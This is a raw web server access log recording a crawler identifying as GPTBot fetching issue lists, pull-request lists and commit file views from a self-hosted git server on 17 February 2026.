[Client 74.7.227.38] [Length 10063] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:30:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:30:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12021] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12022] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12020] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12021] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 11993] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:30:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:30:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10257] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:19:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11872] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:19:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11869] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:19:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11868] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:19:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11868] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:19:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11870] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:19:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=closed&type=all" -[17/Feb/2026:19:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10153] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:19:30:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10147] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:19:30:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9956] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:19:30:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:19:30:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:30:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:30:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=mostcomment&state=open&type=all" 